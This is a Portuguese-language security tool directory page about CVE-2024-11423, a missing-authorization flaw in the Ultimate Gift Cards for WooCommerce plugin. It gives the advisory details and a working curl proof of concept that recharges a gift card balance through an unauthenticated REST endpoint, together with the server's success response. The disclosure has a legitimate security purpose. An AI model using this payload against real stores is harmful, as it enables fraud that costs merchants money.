Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-11423 — Ultimate Gift Cards for WooCommerce <= 3.0.6 - Autorização Ausente para Falha de Dinheiro Infinito | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-11423
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploração de Aplicações WebTestes de Segurança de APIsTestes de Penetração
GitHubrandomrobbiebf/cve-2024-11423

CVE-2024-11423

Ultimate Gift Cards for WooCommerce <= 3.0.6 - Autorização Ausente para Falha de Dinheiro Infinito

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-11423

Ultimate Gift Cards for WooCommerce <= 3.0.6 - Autorização Ausente para Falha de Dinheiro Infinito

Descrição

O plugin para WordPress Ultimate Gift Cards for WooCommerce – Create WooCommerce Gift Cards, Gift Vouchers, Redeem & Manage Digital Gift Coupons. Offer Gift Certificates, Schedule Gift Cards, and Use Advance Coupons With Personalized Templates está vulnerável a modificação não autorizada de dados devido a uma verificação de capacidade ausente em vários endpoints da API REST, como /wp-json/gifting/recharge-giftcard, em todas as versões até, e incluindo, 3.0.6. Isso possibilita que atacantes não autenticados recarreguem o saldo de um cartão-presente, sem efetuar pagamento, além de reduzir saldos de cartões-presente sem comprar nada.

Detalhes

  • Tipo: plugin
  • Slug: woo-gift-cards-lite
  • Versão Afetada: 3.0.6
  • Pontuação CVSS: 7.5
  • Classificação CVSS: Alta
  • Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
  • CVE: CVE-2024-11423
  • Status: Ativo

POC

root@kitploit:~
curl -X POST \
  https://wp-dev.ddev.site/wp-json/gifting/recharge-giftcard \
  -H 'Content-Type: application/json' \
  -d '{"coupon_code": "CUQP4C9M", "recharge_amount": "100.00", "coupon_expiry": "2027-12-31", "usage_limit": "511"}'


{"code":"success","message":"Coupon is successfully Recharged","data":{"status":200,"remaining_amount":120,"discount_type":"fixed_cart","usage_count":0,"usage_limit":"511","description":"","coupon_expiry":"2027-12-31"}}

Baixar ferramenta